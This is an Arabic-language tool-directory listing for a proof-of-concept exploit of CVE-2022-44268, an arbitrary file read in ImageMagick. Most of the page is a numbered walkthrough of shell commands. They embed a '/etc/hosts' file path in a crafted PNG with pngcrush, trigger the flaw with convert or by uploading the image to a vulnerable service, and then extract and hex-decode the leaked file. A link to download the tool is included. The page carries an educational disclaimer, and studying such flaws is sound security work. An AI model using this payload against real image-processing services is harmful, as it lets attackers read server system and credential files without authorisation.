Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC — مولّد حمولة PoC لثغرة CVE-2022-44268 المتعلقة بقراءة الملفات التعسفية في ImageMagick. يوضّح الاستغلال عبر ملفات PNG مُجهّزة خصيصًا لاختبارات الأمان التعليمية. | Kitploit
أدوات/GitHubGitHub/duc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubduc-nt/cve-2022-44268-imagemagick-arbitrary-file-read-poc

CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC

مولّد حمولة PoC لثغرة CVE-2022-44268 المتعلقة بقراءة الملفات التعسفية في ImageMagick. يوضّح الاستغلال عبر ملفات PNG مُجهّزة خصيصًا لاختبارات الأمان التعليمية.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
عرض المستودع
2753756منذ 3 سنواتتمت المراجعة من قبل Kitploit
مشاركة

CVE-2022-44268 إثبات مفهوم قراءة الملفات التعسفية في ImageMagick

إثبات مفهوم لـ CVE-2022-44268 ImageMagick قراءة ملفات تعسفية - مولّد الحمولة

أُنشئ هذا المشروع للأغراض التعليمية فقط ولا يجوز استخدامه لانتهاك القانون أو لتحقيق مكاسب شخصية.

مؤلف هذا المشروع غير مسؤول عن أي ضرر محتمل ناتج عن مواد هذا المشروع.

الاكتشاف الأصلي: https://www.metabaseq.com/imagemagick-zero-days/

الاستخدام:

تثبيت التبعيات:

1. $ apt-get install pngcrush imagemagick exiftool exiv2 -y

تغيير اسم الملف الذي تريد قراءته أدناه:

2. $ pngcrush -text a "profile" "/etc/hosts" vjp.png

تأكيد أن كل شيء يعمل بشكل مثالي:

3. $ exiv2 -pS pngout.png

تشغيل الـ PoC عبر convert أو رفع الصورة إلى الخدمة المعرّضة للثغرة:

4. $ convert pngout.png gopro.png

عرض محتوى الملف المقروء:

5. $ identify -verbose gopro.png

فك تشفير المحتوى:

6. $ python3 -c 'print(bytes.fromhex("23202f6574632f686f73740a3132372e302e302e31096c6f63616c686f73740a0a232054686520666f6c6c6f77696e67206c696e65732061726520646573697261626c6520666f7220495076362063617061626c6520686f7374730a3a3a3109096c6f63616c686f7374206970362d6c6f63616c686f7374206970362d6c6f6f706261636b0a666630323a3a3109096970362d616c6c6e6f6465730a666630323a3a3209096970362d616c6c726f75746572730a6475636e740a").decode("utf-8"))'

عرض توضيحي

تم الاختبار على Ubuntu 22.04 مع تثبيت ImageMagick الافتراضي.

تنزيل الأداة